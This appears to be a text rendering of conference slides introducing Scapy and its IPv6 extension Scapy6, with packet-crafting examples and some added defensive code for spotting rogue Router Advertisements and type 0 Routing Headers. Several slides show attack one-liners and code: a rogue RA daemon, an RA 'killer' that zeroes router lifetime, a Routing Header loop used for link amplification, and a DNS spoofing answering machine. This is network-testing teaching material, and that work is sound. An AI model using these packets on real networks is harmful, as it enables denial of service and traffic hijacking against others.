dst=192.168.8.14 options='' |<ICMP type=echo-reply code=0
chksum=0xffff id=0x0 seq=0x0 |<Padding load='\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x91\xf49\xea' |>>>
Compare this result to hping's:
# hping --icmp 192.168.8.1
HPING 192.168.8.1 (eth0 192.168.8.1): icmp mode set, [...]
len=46 ip=192.168.8.1 ttl=64 id=42457 icmp_seq=0 rtt=2.7 ms
NAT enumeration: How many boxes behind this IP?
>>> a,b=sr( IP(dst="target")/TCP(sport=[RandShort()]*1000) )
>>> a.plot(lambda (s,r): r.id)
[Figure: plot of r.id for each answer; x axis 0 to 1000, y axis 0 to 70000]
[Figure: six such plots, one per target: www.apple.com, www.cisco.com, www.google.com, www.microsoft.com, www.yahoo.fr, www.kernel.org]
Remote traffic estimation
>>> a,b = srloop(IP(dst="www.target.com")/TCP(sport=RandShort()),
prn=lambda (s,r):r.id)
>>> a.diffplot(lambda (s1,r1),(s2,r2): (r2.id-r1.id))
[Figure: plot of the IP ID difference between consecutive answers; x axis 0 to 45, y axis 100 to 1100]
Multiple RTT plotting
>>> res,unans = srloop(IP(dst="target.com",ttl=(5,10))/TCP())
>>> res.multiplot(lambda (s,r): (r.src,(r.time%400,
      r.time-s.time)),with="lines")
[Figure: r.time-s.time (y axis, 0.05 to 0.3) against r.time%400 (x axis, 160 to 340), one line per answering source address]
Outline
1 Introduction to the network testing tools world
2 The Scapy Concept: Concepts, Quick overview, High-level commands, Custom stuff with Scapy
3 Scapy + IPv6 = Scapy6: IPv6, Scapy6 capabilities, ICMPv6 Support
4 Fun Security with Scapy6: Playing with Routing Headers, Quick OS support summary
5 Conclusion
High-Level commands: Traceroute
>>> ans,unans=traceroute(["www.apple.com","www.cisco.com","www.microsoft.com"])
Received 90 packets, got 90 answers, remaining 0 packets
   17.112.152.32:tcp80  198.133.219.25:tcp80 207.46.19.30:tcp80
1  172.16.15.254   11   172.16.15.254   11   172.16.15.254   11
2  172.16.16.1     11   172.16.16.1     11   172.16.16.1     11
[...]
11 212.187.128.57  11   212.187.128.57  11   212.187.128.46  11
12 4.68.128.106    11   4.68.128.106    11   4.68.128.102    11
13 4.68.97.5       11   64.159.1.130    11   209.247.10.133  11
14 4.68.127.6      11   4.68.123.73     11   209.247.9.50    11
15 12.122.80.22    11   4.0.26.14       11   63.211.220.82   11
16 12.122.10.2     11   128.107.239.53  11   207.46.40.129   11
17 12.122.10.6     11   128.107.224.69  11   207.46.35.150   11
18 12.122.2.245    11   198.133.219.25  SA   207.46.37.26    11
19 12.124.34.38    11   198.133.219.25  SA   64.4.63.70      11
20 17.112.8.11     11   198.133.219.25  SA   64.4.62.130     11
21 17.112.152.32   SA   198.133.219.25  SA   207.46.19.30    SA
[...]
>>> ans[0][1]
<IP version=4L ihl=5L tos=0xc0 len=68 id=11202 flags= frag=0L ttl=64 proto=ICMP chksum=0xd6b3
src=172.16.15.254 dst=172.16.15.101 options='' |<ICMP type=time-exceeded code=0 chksum=0x5a20 id=0x0
seq=0x0 |<IPerror version=4L ihl=5L tos=0x0 len=40 id=14140 flags= frag=0L ttl=1 proto=TCP chksum=0x1d8f
src=172.16.15.101 dst=17.112.152.32 options='' |<TCPerror sport=18683 dport=80 seq=1345082411L ack=0L
dataofs=5L reserved=16L flags=S window=0 chksum=0x5d3a urgptr=0 |>>>>
>>> ans[57][1].summary()
'Ether / IP / TCP 198.133.219.25:80 > 172.16.15.101:34711 SA / Padding'
High-Level commands: Traceroute graphing, AS clustering
>>> ans.graph()
[Figure: graph of the traceroute paths with routers clustered by AS: 7018 [ATT-INTERNET4 - AT&T WorldNet], 8075 [MICROSOFT-CORP---MSN-AS-BLOCK], 12076 [HOTMAIL-AS - Hotmail Corporati], 109 [CISCO-EU-109 Cisco Systems Glo], 3356 [LEVEL3 Level 3 Communications], 714 [APPLE-ENGINEERING - Apple Comp]; the destinations 17.112.152.32, 198.133.219.25 and 207.46.19.30 are labelled "80: SA"]
High-Level commands: Traceroute graphing, 3D toy
>>> ans.trace3D()
High-Level commands: ARP ping
>>> arping("172.16.15.0/24")
Begin emission:
*Finished to send 256 packets.
*
Received 2 packets, got 2 answers, remaining 254 packets
00:12:3f:0a:84:5a 172.16.15.64
00:12:79:3d:a3:6a 172.16.15.254
(<ARPing: UDP:0 TCP:0 ICMP:0 Other:2>,
<Unanswered: UDP:0 TCP:0 ICMP:0 Other:254>)
Implementing a new protocol
Each layer is a subclass of Packet
Each layer is described by a list of fields
This description is sufficient for assembly and disassembly
Each field is an instance of a Field subclass
Each field has at least a name and a default value
Example
# Packet and the field classes are provided by Scapy
class Test(Packet):
    name = "Test protocol"
    fields_desc = [
        ByteField("field1", 1),
        XShortField("field2", 2),
        IntEnumField("field3", 3, {1: "one", 10: "ten"}),
    ]
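Why a field list alone is enough for both assembly and disassembly, as an added Python 3 sketch that is not Scapy's implementation and not code from the talk. The minimal Field and Packet classes are stand-ins written for illustration, and SlideTest reuses the field list of the slide's Test class.

```python
import struct


class Field:
    """A named slot: a struct format (network byte order) and a default."""
    fmt = "!B"

    def __init__(self, name, default):
        self.name, self.default = name, default
        self.size = struct.calcsize(self.fmt)

    def pack(self, value):
        return struct.pack(self.fmt, value)

    def unpack(self, data):
        # Return (value, remaining bytes); refuse to read past the buffer.
        if len(data) < self.size:
            raise ValueError("truncated before field %r" % self.name)
        return struct.unpack(self.fmt, data[:self.size])[0], data[self.size:]

    def show(self, value):
        return str(value)


class ByteField(Field):
    fmt = "!B"


class XShortField(Field):
    fmt = "!H"

    def show(self, value):          # the "X" means: display as hex
        return hex(value)


class IntEnumField(Field):
    fmt = "!I"

    def __init__(self, name, default, enum):
        super().__init__(name, default)
        self.enum = enum

    def show(self, value):          # symbolic name when one is known
        return self.enum.get(value, str(value))


class Packet:
    fields_desc = []

    def __init__(self, **values):
        unknown = set(values) - {f.name for f in self.fields_desc}
        if unknown:
            raise AttributeError("unknown field(s): %s" % sorted(unknown))
        # Any field the caller did not set takes its default value.
        self.values = {f.name: values.get(f.name, f.default)
                       for f in self.fields_desc}

    def build(self):
        # Assembly: walk the description in order and pack each value.
        return b"".join(f.pack(self.values[f.name]) for f in self.fields_desc)

    @classmethod
    def dissect(cls, data):
        # Disassembly: walk the same description and consume the bytes.
        values = {}
        for f in cls.fields_desc:
            values[f.name], data = f.unpack(data)
        return cls(**values), data  # leftover bytes are the payload

    def show(self):
        return " ".join("%s=%s" % (f.name, f.show(self.values[f.name]))
                        for f in self.fields_desc)


class SlideTest(Packet):
    # Same field list as the slide's Test class.
    name = "Test protocol"
    fields_desc = [
        ByteField("field1", 1),
        XShortField("field2", 2),
        IntEnumField("field3", 3, {1: "one", 10: "ten"}),
    ]


if __name__ == "__main__":
    wire = SlideTest(field3=10).build()
    print(wire.hex())
    pkt, rest = SlideTest.dissect(b"\x07\xbe\xef\x00\x00\x00\x0a" + b"xy")
    print(pkt.show(), rest)
```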
Use Scapy in your own tools: Executable interactive add-on
You can extend Scapy in a separate file and benefit from Scapy interaction
Example
#! /usr/bin/env python

from scapy import *

class Test(Packet):
    name = "Test packet"
    fields_desc = [ ShortField("test1", 1),
                    ShortField("test2", 2) ]

def make_test(x, y):
    return Ether()/IP()/Test(test1=x, test2=y)

interact(mydict=globals(), mybanner="Test add-on v3.14")
Use Scapy in your own tools
External script
You can make your own autonomous Scapy scripts
Example
```python
#! /usr/bin/env python

import sys
if len(sys.argv) != 2:
    print "Usage: arping <net>\n eg: arping 192.168.1.0/24"
    sys.exit(1)

from scapy import srp,Ether,ARP,conf
conf.verb=0
ans,unans=srp(Ether(dst="ff:ff:ff:ff:ff:ff")
              /ARP(pdst=sys.argv[1]),
              timeout=2)

for s,r in ans:
    print r.sprintf("%Ether.src% %ARP.psrc%")
```
Continuous traffic monitoring
use sniff() and the prn parameter
the callback function will be applied to every packet
BPF filters will improve performance
store=0 prevents sniff() from storing every packet
Example
```python
#! /usr/bin/env python
from scapy import *

def arp_monitor_callback(pkt):
    if ARP in pkt and pkt[ARP].op in (1,2): #who-has or is-at
        return pkt.sprintf("%ARP.hwsrc% %ARP.psrc%")

sniff(prn=arp_monitor_callback, filter="arp", store=0)
```
Structural differences with IPv4
New header format
from 14 to 8 fields
[Figure: IPv6 header layout, drawn 32 bits wide. Version (4 bits), Traffic Class (8), Flow Label (20), Payload Length (16), Next Header (8), Hop Limit (8), Source IPv6 Address (128), Destination IPv6 Address (128), 40 octets in total; then Extension Header Information (Next Header, 8 bits, followed by a variable-size body) and the Payload.]
Structural differences with IPv4
Chaining and extensions
Goodbye IP options, welcome IPv6 extensions!
[Figure: three numbered example packets whose headers are linked by the Next Header field, built from IPv6, Routing Header, Fragment Header, ESP, TCP, UDP and ICMPv6 headers followed by their data.]
Functional differences with IPv4
Forget all you knew for IPv4
Autoconfiguration Mechanisms
ARP has gone. Extended by Neighbor Discovery
Broadcast replaced by link-local scope multicast
End-to-End principle
Releasing core routers from intensive computation.
Fragmentation is performed by end nodes
Checksum computation is performed by end nodes at L4
IPv6 header fixed size simplifies handling (or not).
NAT makes no sense under IPv6 : no states ⇒ no SPoF.
A tour of IPv6 support
Generalities
Works on Linux, FreeBSD, NetBSD and Mac OS X
Requires a recent version of Scapy
Provided under GNU GPLv2 License
Developed with Guillaume Valadon (Esaki Lab / LIP6)
Link : http://namabiiru.hongo.wide.ad.jp/scapy6
Remarks, bug reports and patches are welcome !!!
A tour of IPv6 support
IPv6 support: make it natural
s/IP/IPv6/g
$ sudo scapy6
Welcome to Scapy (1.0.4.84beta)
IPv6 enabled
>>> a=IPv6(dst="www.netbsd.org")/TCP(dport=[21,80])
>>> a
<IPv6 nh=TCP dst=2001:4f8:4:7:2e0:81ff:fe52:9a6b |<TCP dport=[21, 80] |>>
>>> send(a)
..
Sent 2 packets.
>>> a.dst="2001:6c8:6:4::7" # ftp.freebsd.org
>>> a[TCP].dport=21
>>> a
<IPv6 nh=TCP dst=2001:6c8:6:4::7 |<TCP dport=ftp |>>
>>> b=sr1(a, verbose=0)
>>> b.src
2001:6c8:6:4::7
>>>
A tour of IPv6 support
Conversations
>>> a=sniff(filter="ip6")
>>> a
<Sniffed: UDP:0 TCP:219 ICMP:0 Other:3>
>>> a.conversations(getsrcdst=lambda x:(x[IPv6].src, x[IPv6].dst), \
                    type="png", target="> /tmp/conversations.png")
[Figure: conversations graph linking 2001:db8:67df:1::2, 2001:db8:67df:1:20e:1fff:feda:4660, ff02::1:ff00:2 and 2001:db8:67df:1::1]
A tour of IPv6 support
IPv6 support: simplifying IPv6 packet crafting
Scapy6 spares you the need to care about :
L2 address resolution (ND support);
L2/L3 source/destination address selection;
Name to address translation (aka DNS resolution);
L4 checksum computation;
Default values filling (static/dynamic ones);
Hop Limit values in specific cases (ND);
Layer bindings (Next Header field filling);
. . .
⇒ You keep your mind focused on fields of interest !!
A tour of IPv6 support
A simple example
The one line Router Advertisement daemon
>>> sendp(Ether()/IPv6()/ICMPv6ND_RA()/ \
          ICMPv6NDOptPrefixInfo(prefix="2001:db8:cafe:deca::", \
                                prefixlen=64)/ \
          ICMPv6NDOptSrcLLAddr(lladdr="00:b0:b0:67:89:AB"), \
          loop=1, inter=3)
What Scapy6 did for you today :
You provided the 3 most important values (prefix, prefix length and router Link layer Address).
Scapy6 filled addresses, Hop Limit, Next Header, Flags, checksum, length fields in a consistent way.
Other simple examples
What’s your name ?
>>> someaddr=["2001:6c8:6:4::7", "2001:500::1035", "2001:1ba0:0:4::1",
"2001:2f0:104:1:2e0:18ff:fea8:16f5", "2001:e40:100:207::2",
"2001:7f8:2:1::18", "2001:4f8:0:2::e", "2001:4f8:0:2::d"]
>>> for addr in someaddr:
...     a = sr1(IPv6(dst=addr)/ICMPv6NIQueryName(data=addr), verbose=0)
...     print a.sprintf( "%-35s,src%: %data%")
...
2001:6c8:6:4::7 : ['ftp.beastie.tdk.net.']
2001:500::1035 : ['pao1b.f.root-servers.org.']
2001:1ba0:0:4::1 : ['rimfall.dialtelecom.sk.']
2001:2f0:104:1:2e0:18ff:fea8:16f5 : ['updraft3.jp.freebsd.org.']
2001:e40:100:207::2 : ['ring.sakura.ad.jp.']
2001:7f8:2:1::18 : ['z2.internal.securanetworks.net.']
2001:4f8:0:2::e : ['sf1.isc.org.']
2001:4f8:0:2::d : ['webster.isc.org.']
Other simple examples
It gets even more funny with multicast
>>> a=sr(IPv6(dst="ff02::1")/ICMPv6NIQueryName(data="ff02::1"))
...
fe80::20a:5eff:fe00:1349 : ['assam.ipv6.test.lab.']
fe80::20a:4aff:fe3d:4c27 : ['lotus.ipv6.test.lab.']
fe80::20a:6cff:fe27:1c49 : ['yunnan.ipv6.test.lab.']
fe80::20a:5bff:fe20:1d5a : ['darjeeling.ipv6.test.lab.']
The one line Router Advertisement daemon killer
>>> send(IPv6(src=server)/ICMPv6ND_RA(routerlifetime=0), loop=1, inter=1)
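A monitoring-side check for the Router Advertisement one-liners shown in these slides, added here as an example that is not part of the original deck or of Scapy6. It decodes a raw ICMPv6 RA with the standard library and compares it with an inventory of legitimate routers. The inventory layout, function names, finding codes and the fe80::1 router address are assumptions; the sample RAs are constructed and reuse the prefix and link-layer address from the slide.

```python
import ipaddress
import struct

RA_TYPE = 134                                   # ICMPv6 Router Advertisement
OPT_SRC_LLADDR, OPT_PREFIX_INFO = 1, 3          # ND option types

# Assumed site inventory: link-local source -> expected MAC and advertised prefixes.
KNOWN_ROUTERS = {
    "fe80::1": {"lladdr": "00:b0:b0:67:89:ab",
                "prefixes": {"2001:db8:cafe:deca::/64"}},
}


def parse_ra(icmp):
    """Decode the RA fields a monitor cares about from raw ICMPv6 bytes."""
    if len(icmp) < 16 or icmp[0] != RA_TYPE:
        raise ValueError("not a Router Advertisement")
    ra = {"router_lifetime": struct.unpack("!H", icmp[6:8])[0],
          "lladdr": None, "prefixes": []}
    off = 16                                    # options follow the fixed RA part
    while off + 2 <= len(icmp):
        otype, olen = icmp[off], icmp[off + 1] * 8   # length is in 8-octet units
        if olen == 0 or off + olen > len(icmp):
            raise ValueError("malformed ND option")
        body = icmp[off + 2:off + olen]
        if otype == OPT_SRC_LLADDR and olen == 8:
            ra["lladdr"] = ":".join("%02x" % b for b in body[:6])
        elif otype == OPT_PREFIX_INFO and olen == 32:
            prefix = ipaddress.IPv6Address(body[14:30])
            net = ipaddress.IPv6Network((prefix, body[0]), strict=False)
            ra["prefixes"].append(str(net))
        off += olen
    return ra


def check_ra(src, hop_limit, icmp, known_routers):
    """Return (code, detail) findings for one received RA."""
    ra = parse_ra(icmp)
    findings = []
    src_addr = ipaddress.IPv6Address(src)
    if hop_limit != 255:                        # ND messages must arrive with Hop Limit 255
        findings.append(("hop-limit", "hop limit %d, RA crossed a router" % hop_limit))
    if not src_addr.is_link_local:
        findings.append(("non-link-local-source", str(src_addr)))
    expected = known_routers.get(str(src_addr))
    if expected is None:
        findings.append(("unknown-router", str(src_addr)))
        return findings
    if ra["lladdr"] and ra["lladdr"] != expected["lladdr"]:
        findings.append(("lladdr-mismatch", ra["lladdr"]))
    for net in ra["prefixes"]:
        if net not in expected["prefixes"]:
            findings.append(("unexpected-prefix", net))
    if ra["router_lifetime"] == 0:
        # Hosts stop using this router as default: a shutdown notice or a spoofed RA.
        findings.append(("router-lifetime-zero", str(src_addr)))
    return findings


def build_ra(lifetime, prefix=None, plen=64, mac=None):
    """Constructed sample RA (checksum left at zero; it is not verified here)."""
    msg = struct.pack("!BBHBBHII", RA_TYPE, 0, 0, 64, 0, lifetime, 0, 0)
    if prefix:
        msg += struct.pack("!BBBBIII", OPT_PREFIX_INFO, 4, plen, 0xC0,
                           2592000, 604800, 0)
        msg += ipaddress.IPv6Address(prefix).packed
    if mac:
        msg += bytes([OPT_SRC_LLADDR, 1]) + bytes.fromhex(mac.replace(":", ""))
    return msg


if __name__ == "__main__":
    samples = [("fe80::1", 255, build_ra(1800, "2001:db8:cafe:deca::", 64, "00:b0:b0:67:89:AB")),
               ("fe80::1", 255, build_ra(0))]
    for src, hlim, raw in samples:
        print(src, check_ra(src, hlim, raw, KNOWN_ROUTERS))
```

A zero router lifetime cannot be told apart from a legitimate router shutdown by the packet alone, so the check reports it for correlation with planned maintenance rather than treating it as proof of spoofing.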
ICMPv6 Support
ICMPv6 was promoted (1/2)
ICMPv6 <TAB> <TAB>
```
ICMPv6EchoRequest     ICMPv6ND_INDAdv          /* Inverse Neighbor Discovery */
ICMPv6EchoReply       ICMPv6ND_INDSol
ICMPv6DestUnreach     ICMPv6NDOptHAInfo        /* Mobile IPv6 */
ICMPv6ParamProblem    ICMPv6NDOptMTU           /* Link MTU in RA */
ICMPv6TimeExceeded    ICMPv6NDOptPrefixInfo    /* Main RA content */
ICMPv6PacketTooBig    ICMPv6NDOptRedirectedHdr
                      ICMPv6NDOptSrcAddrList
ICMPv6ND_RS           ICMPv6NDOptSrcLLAddr     /* L2 Addr in RS/NS */
ICMPv6ND_RA           ICMPv6NDOptTgtAddrList   /* L2 Addr in NS */
ICMPv6ND_NS           ICMPv6NDOptDstLLAddr
ICMPv6ND_NA           ICMPv6NDOptAdvInterval
ICMPv6ND_Redirect     ICMPv6NDOptUnknown       /* Generic fallback */
```
ICMPv6 Support
ICMPv6 was promoted (2/2)
ICMPv6 <TAB> <TAB>
```
ICMPv6HAADReply          /* Mobile IPv6 */                     ICMPv6NIQuery
ICMPv6HAADRequest                                              ICMPv6NIQueryIPv4
ICMPv6MPAdv                                                    ICMPv6NIQueryIPv6
ICMPv6MPSol                                                    ICMPv6NIQueryLocal
                                                               ICMPv6NIQueryName
ICMPv6MLDone             /* Multicast Listener Discovery */    ICMPv6NIReply
ICMPv6MLQuery                                                  ICMPv6NIReplyRefuse
ICMPv6MLReport                                                 ICMPv6NIReplySuccess
                                                               ICMPv6NIReplySuccessIPv4
ICMPv6MRD_Advertisement                                        ICMPv6NIReplySuccessIPv6
ICMPv6MRD_Solicitation                                         ICMPv6NIReplySuccessName
ICMPv6MRD_Termination                                          ICMPv6NIReplyUnknown
```
Basic Routing Header example
What’s inside
```python
class IPv6OptionHeaderRouting(IPv6OptionHeader):
    name = "IPv6 Option Header Routing"
    fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
                    ByteField("len", None),
                    ByteField("type", 0),
                    ByteField("segleft", None),
                    BitField("reserved", 0, 32),
                    IP6RoutingHeaderListField("addresses", []) ]
    overload_fields = { IPv6: { "nh": 43 }}
```
sr1() Example
>>> a = sr1(IPv6(dst="2001:4f8:4:7:2e0:81ff:fe52:9a6b")/ \
            IPv6OptionHeaderRouting(addresses=["2001:78:1:32::1", "2001:20:82:203:fea5:385"])/ \
            ICMPv6EchoRequest(data=RandString(7)), verbose=0)
>>> a.src
"2001:20:82:203:fea5:385"
>>>
Remote and boomerang traceroute
>>> waypoint = "2001:301:0:8002:203:47ff:fea5:3085"
>>> target = "2001:5f9:4:7:2e0:81ff:fe52:9a6b"
>>> traceroute6(waypoint, minttl=15 , maxttl=34, \
                l4=IPv6OptionHeaderRouting(addresses=[target])/ \
                ICMPv6EchoRequest(data=RandString(7)))
2001:301:0:8002:203:47ff:fea5:3085 :IER
15 2001:319:2000:5000::92 3
16 2001:301:0:1c04:230:13ff:feae:5b 3
17 2001:301:0:4800::7800:1 3
18 2001:301:0:8002:203:47ff:fea5:3085 3
19 2001:301:0:2::6800:1 3
20 2001:301:0:1c04:20e:39ff:fee3:3400 3
21 2001:301:133::1dec:0 3
22 2001:301:901:7::18 3
23 2001:301:0:1800::2914:1 3
24 2001:319:2000:3002::21 3
25 2001:319:0:6000::19 3
26 2001:319:0:2000::cd 3
27 2001:519:0:2000::196 3
28 2001:519:0:5000::1e 3
29 2001:5f9:0:1::3:2 3
30 2001:5f9:0:1::5:2 3
31 2001:5f9:0:1::f:1 3
32 2001:5f9:0:1::14:2 3
33 2001:5f9:4:7:2e0:81ff:fe52:9a6b 129
34 2001:5f9:4:7:2e0:81ff:fe52:9a6b 129
(<Traceroute: ICMP:0 UDP:0 TCP:0 Other:20>,
<Unanswered: ICMP:0 UDP:0 TCP:0 Other:0>)
[Figure: network diagram with the Source, the Waypoint and the Target connected through IPv6 routers, showing the natural path and the forced path (using RH0).]
Funny game
Rules of the game
Goal
Keep an IPv6 packet as long as possible in IPv6 Internet routing infrastructure.
Rules
No L4 help : only IPv6 L3 infrastructure hijacking
No cheating : explicit tunnels are banned (2002::/16, . . . )
No abuse : it’s only a game !!
Clue
It’s based on Routing Header mechanism . . .
Funny game
Solution
Current high score
>>> addr1 = '2001:4830:ff:12ea::2'
>>> addr2 = '2001:360:1:10::2'
>>> zz=time.time(); \
    a=sr1(IPv6(dst=addr2, hlim=255)/ \
    IPv6OptionHeaderRouting(addresses=[addr1, addr2]*43)/ \
    ICMPv6EchoRequest(data="staythere"), verbose=0, timeout=80); \
    print "%.2f seconds" % (time.time() - zz)
32.29 seconds
>>>
Link saturation / Amplification effect
100 KBytes/s upload bandwidth,
32 seconds storage between the 2 routers
⇒ 1.6 MBytes/sec of traffic in both directions on the link
Routing Header processing
| OS | Host | Router | Firewallable | Deactivable |
|---|---|---|---|---|
| Linux 2.6 | dropped | routed | not reliably | no |
| FreeBSD 6.1 | routed | routed | not reliably | no |
| Mac OS X | routed | routed | no | no |
| OpenBSD 3.8 | routed | routed | no | no |
| XP SP2 | dropped | - | - | - |
| Vista | dropped | - | - | - |
| Cisco IOS | - | routed | not reliably | yes |
| Juniper | - | routed | no | no |
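What a filter has to do to spot a type 0 Routing Header, given the Next Header chaining and the Routing Header fields (nh, len, type, segleft, addresses) shown in the earlier slides. This is an added example, not code from the slides or from Scapy6: a standard-library walker over raw packet bytes with a small set of RH0 findings. Function names and finding codes are assumptions, and the sample packets are constructed with documentation-prefix addresses.

```python
import ipaddress
import struct

# Next Header values of the extension headers followed here (IANA protocol numbers).
HOP_BY_HOP, ROUTING, FRAGMENT, DEST_OPTS = 0, 43, 44, 60
EXT_NAMES = {HOP_BY_HOP: "hop-by-hop", ROUTING: "routing",
             FRAGMENT: "fragment", DEST_OPTS: "dest-opts"}


def walk_ipv6(packet):
    """Parse the fixed 40-octet header, then follow the Next Header chain."""
    if len(packet) < 40:
        raise ValueError("truncated IPv6 header")
    vtf, plen, nh, hlim = struct.unpack("!IHBB", packet[:8])
    if vtf >> 28 != 6:
        raise ValueError("not an IPv6 packet")
    info = {"src": str(ipaddress.IPv6Address(packet[8:24])),
            "dst": str(ipaddress.IPv6Address(packet[24:40])),
            "hlim": hlim, "chain": [], "routing": []}
    end = min(len(packet), 40 + plen)
    off = 40
    while nh in EXT_NAMES:
        if off + 8 > end:
            raise ValueError("truncated extension header")
        next_nh, hdr_len = packet[off], packet[off + 1]
        # A Fragment header is always 8 octets; the others are (len + 1) * 8.
        size = 8 if nh == FRAGMENT else (hdr_len + 1) * 8
        if off + size > end:
            raise ValueError("extension header overruns the payload")
        info["chain"].append(EXT_NAMES[nh])
        later_fragment = False
        if nh == ROUTING:
            rtype, segleft = packet[off + 2], packet[off + 3]
            addrs = []
            if rtype == 0:      # type 0: 4 reserved octets, then the address list
                body = packet[off + 8:off + size]
                addrs = [str(ipaddress.IPv6Address(body[i:i + 16]))
                         for i in range(0, len(body) - 15, 16)]
            info["routing"].append({"type": rtype, "segleft": segleft,
                                    "addresses": addrs})
        elif nh == FRAGMENT:
            later_fragment = struct.unpack("!H", packet[off + 2:off + 4])[0] >> 3 != 0
        nh, off = next_nh, off + size
        if later_fragment:
            break               # only the first fragment carries the rest of the chain
    info["upper"] = nh
    return info


def rh0_findings(info):
    """Policy findings for type 0 Routing Headers (IPv6 source routing)."""
    findings = []
    for rh in info["routing"]:
        if rh["type"] != 0:
            continue
        findings.append("rh0-present")
        if rh["segleft"] > 0:
            findings.append("rh0-segments-left")      # a node honouring it forwards again
        if rh["segleft"] > len(rh["addresses"]):
            findings.append("rh0-segleft-exceeds-list")
        if len(set(rh["addresses"])) < len(rh["addresses"]):
            findings.append("rh0-repeated-waypoint")  # same hop listed more than once
    return findings


def build_sample(waypoints):
    """Constructed packet: IPv6 / optional RH0 / ICMPv6 Echo Request (checksum zero)."""
    icmp = bytes([128, 0, 0, 0, 0, 1, 0, 1]) + b"sample"
    payload, first_nh = icmp, 58
    if waypoints:
        n = len(waypoints)
        rh = bytes([58, 2 * n, 0, n]) + bytes(4)
        rh += b"".join(ipaddress.IPv6Address(a).packed for a in waypoints)
        payload, first_nh = rh + icmp, ROUTING
    hdr = struct.pack("!IHBB", 6 << 28, len(payload), first_nh, 64)
    hdr += ipaddress.IPv6Address("2001:db8::1").packed
    hdr += ipaddress.IPv6Address("2001:db8:a::1").packed
    return hdr + payload


if __name__ == "__main__":
    for hops in ([], ["2001:db8:c::1"], ["2001:db8:a::1", "2001:db8:b::1"] * 2):
        info = walk_ipv6(build_sample(hops))
        print(info["chain"], info["upper"], rh0_findings(info))
```

RFC 5095 later deprecated the type 0 Routing Header, so dropping packets that produce `rh0-present` is a reasonable default policy at a filtering point.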
In the pipe
IKEv2 and Teredo
Teredo
External extension for Scapy6
Most of the work already done (70%)
Waiting for 2001::/32 prefix to be propagated
Expected with/before Windows® Vista™ release
IKEv2
Challenging extension on many aspects
A playground for state and crypto support in Scapy
Expected before a stable Racoon2 release ;-)
3D visualization/interactions
A picture is worth a thousand words
Conclusion
IPv6 is coming, with a lot of things to look at.
It’s both . . .
. . . simple (design)
. . . complicated (extensions, transition mechanisms)
It’s like no one learned from IPv4 problems. Implementors are making the same mistakes again (source routing)
We need tools to test stacks and products
Turning ideas into PoC is a question of seconds with Scapy6
The End
That’s all folks! Thanks for your attention.
You can reach us at:
Useful links:
Scapy: http://www.secdev.org/projects/scapy
Scapy6: http://namabiiru.hongo.wide.ad.jp/scapy6
UTscapy: http://www.secdev.org/projects/UTscapy
These slides: http://www.secdev.org/
Appendices
6 References
7 Additional material: Learning Python in 2 slides, Answering machines
8 zoomed frames
Learning Python in 2 slides (1/2)
This is an int (signed, 32bits) : 42
This is a long (signed, infinite): 42L
This is a str : "bell\x07\n" or 'bell\x07\n' (" ⇐⇒ ')
This is a tuple (immutable): (1,4, "42")
This is a list (mutable): [4,2, "1"]
This is a dict (mutable): { "one":1 , "two":2 }
Learning Python in 2 slides (2/2)
No block delimiters. Indentation does matter.
```python
if cond1:
    instr
    instr
elif cond2:
    instr
else:
    instr

while cond:
    instr
    instr

try:
    instr
except exception:
    instr
else:
    instr

def fact(x):
    if x == 0:
        return 1
    else:
        return x*fact(x-1)

for var in set:
    instr

lambda x,y: x+y
```
Answering machines
An answering machine enables you to quickly design a stimulus/response daemon
Already implemented: fake DNS server, ARP spoofer, DHCP daemon, FakeARPd, Airpwn clone
Interface description

```python
class Demo_am(AnsweringMachine):
    function_name = "demo"
    filter = "a bpf filter if needed"
    def parse_options(self, ...):
        ....
    def is_request(self, req):
        # return 1 if req is a request
    def make_reply(self, req):
        # return the reply for req
```
Answering machines: Using answering machines
The class must be instantiated
The parameters given to the constructor become default parameters
The instance is a callable object whose default parameters can be overloaded
Once called, the instance loops, sniffs and answers stimuli
Side note:
Declaring an answering machine class automatically creates a function, named after the function_name class attribute, that instantiates and runs the answering machine. This is done thanks to the ReferenceAM metaclass.
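The mechanism described on this slide, modelled without Scapy as an added example (it is not the Scapy source): the metaclass and base class below are re-implementations that borrow the slide's names, while `registry`, `Echo_am`, the `stimuli` option and the sample data are assumptions made for the illustration. Stimuli are plain dicts fed from a finite list instead of sniffed packets.

```python
registry = {}  # stand-in for the namespace where the launcher functions are published

class ReferenceAM(type):
    """Metaclass: declaring a subclass also publishes a launcher function."""
    def __new__(mcs, name, bases, dct):
        cls = super().__new__(mcs, name, bases, dct)
        if cls.function_name:
            # The launcher instantiates the class, then runs the instance.
            registry[cls.function_name] = lambda *a, **kw: cls(*a, **kw)()
        return cls

class AnsweringMachine(metaclass=ReferenceAM):
    function_name = ""

    def __init__(self, **defaults):
        self.defaults = defaults  # constructor parameters become the defaults

    def __call__(self, **overrides):
        options = {**self.defaults, **overrides}  # overloaded for this run only
        stimuli = options.pop("stimuli", ())      # finite list instead of a sniffer
        self.parse_options(**options)
        return [self.make_reply(s) for s in stimuli if self.is_request(s)]

    def parse_options(self, **options):
        pass

    def is_request(self, req):
        return True

    def make_reply(self, req):
        return req

class Echo_am(AnsweringMachine):  # hypothetical machine, not part of Scapy
    function_name = "echo"

    def parse_options(self, prefix="re: "):
        self.prefix = prefix

    def is_request(self, req):
        return req.get("type") == "request"

    def make_reply(self, req):
        return {"type": "reply", "data": self.prefix + req["data"]}

# Constructed sample stimuli: one request and one unrelated message.
SAMPLE = [{"type": "request", "data": "ping"}, {"type": "reply", "data": "pong"}]
```

Calling `Echo_am(stimuli=SAMPLE, prefix="ack: ")()` uses the constructor defaults, passing `prefix=` at call time overloads them for that run, and `registry["echo"](stimuli=SAMPLE)` is the one-call launcher the metaclass created.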
Answering machines: DNS spoofing example

```python
class DNS_am(AnsweringMachine):
    function_name = "dns_spoof"
    filter = "udp port 53"

    def parse_options(self, joker="192.168.1.1", zone=None):
        # zone maps query names to answers; joker is the answer for any other name
        if zone is None:
            zone = {}
        self.zone = zone
        self.joker = joker

    def is_request(self, req):
        # qr == 0 marks a DNS query
        return req.haslayer(DNS) and req.getlayer(DNS).qr == 0

    def make_reply(self, req):
        ip = req.getlayer(IP)
        dns = req.getlayer(DNS)
        # The slide cuts this line after "sport="; completed with the mirrored port
        resp = IP(dst=ip.src, src=ip.dst)/UDP(dport=ip.sport, sport=ip.dport)
        rdata = self.zone.get(dns.qd.qname, self.joker)
        # The slide cuts the last argument at "rdata=rd"; completed with rdata above
        resp /= DNS(id=dns.id, qr=1, qd=dns.qd,
                    an=DNSRR(rrname=dns.qd.qname, ttl=10, rdata=rdata))
